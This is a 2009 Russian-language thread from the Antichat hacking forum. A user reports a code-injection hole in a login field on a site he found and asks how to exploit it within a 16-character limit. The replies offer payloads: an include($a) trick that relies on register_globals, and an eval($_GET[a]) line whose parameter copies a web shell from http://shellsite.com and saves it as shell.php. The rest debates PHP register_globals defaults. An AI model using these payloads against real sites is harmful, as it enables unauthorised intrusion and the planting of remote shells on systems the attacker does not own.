HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу 16 символов :(
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

16 символов :(
  #1  
Старый 06.07.2009, 10:10
Mr.Hardwar
Новичок
Регистрация: 20.09.2008
Сообщений: 3
С нами: 9283488

Репутация: 0
По умолчанию 16 символов :(
На одном ресе обнаружил такую штуку: когда входишь на сайт то на странице пишется "Привет ЛОГИН". так вот, при регистрации в поле логин никакой фильтрации нет и можно указывать любые символы. Облом лишь в том что обработчик формы не регает логины больше 16 символов!

Подскажите как можно использовать эту уязвимость. работает phpinfo() sleep(), а больше не хватает у меня ни фантазии ни символов
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 06.07.2009, 20:38
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
При register_globals=ON
PHP код:
include($a
Потом в GET['a'] - путь к шеллу
 
Ответить с цитированием

  #3  
Старый 07.07.2009, 21:27
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию
Цитата:
Сообщение от mailbrush  
При register_globals=ON
PHP код:
include($a
Потом в GET['a'] - путь к шеллу
PHP код:
include($_GET
Вроде же.
Что то я непробывал просто так присваивать массиву из ниоткуда, что бы он брал из GET запроса.
Или я видимо ещё незнал об этом.
Если твой пример правильный, дико извеняюсь
 
Ответить с цитированием

  #4  
Старый 08.07.2009, 01:50
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от Ctacok  
PHP код:
include($_GET
Вроде же.
Что то я непробывал просто так присваивать массиву из ниоткуда, что бы он брал из GET запроса.
Или я видимо ещё незнал об этом.
Если твой пример правильный, дико извеняюсь

Цитата:
Сообщение от mailbrush  
При register_globals=ON
какбе
 
Ответить с цитированием

  #5  
Старый 08.07.2009, 02:03
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию
eval($_GET[a]); &a=copy('http://shellsite.com/shell.txt','shell.php'); ну в этом стиле.
 
Ответить с цитированием

  #6  
Старый 08.07.2009, 02:06
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию
include($_GET['a']) - больше 16 какбе
регистер глобалс по дефолту включён какбе
 
Ответить с цитированием

  #7  
Старый 08.07.2009, 02:20
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию
Цитата:
Сообщение от Spyder  
include($_GET['a']) - больше 16 какбе
регистер глобалс по дефолту включён какбе
включен на таких версиях старых что поискать надо:
Цитата:
Сообщение от phpman  
Наверное, наиболее спорным моментом в разработке PHP стала замена значения по умолчанию для опции register_globals с ON на OFF в версии 4.2.0.
 
Ответить с цитированием

  #8  
Старый 08.07.2009, 02:27
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию
чёта у меня в на локалхосте по дефолту он был, пшп 5
 
Ответить с цитированием

  #9  
Старый 08.07.2009, 02:42
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию
Цитата:
Сообщение от Spyder  
чёта у меня в на локалхосте по дефолту он был, пшп 5
МБ сам включил и подзабыл(бывает такое дистр сохранил и прям в нем поизменял) ну или в денвер/xamp/прочая нежить был поставлен в on а так с 4.2.0 в офф он по дефолту.
 
Ответить с цитированием

  #10  
Старый 08.07.2009, 02:38
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами: 10216668

Репутация: 930


По умолчанию
По дефолту уже давно офф, а в шестой версии вроде и вовсе отключат.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[php] Новичкам: задаем вопросы _Great_ PHP 16396 17.06.2010 21:19
Вопросы по созданию Rainbow от 8 символов для MD5 Thanat0z Криптография, расшифровка хешей 12 11.02.2007 04:12
Кому нужно перебрать до 9 символов - сюда! hesher Криптография, расшифровка хешей 177 27.09.2005 21:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.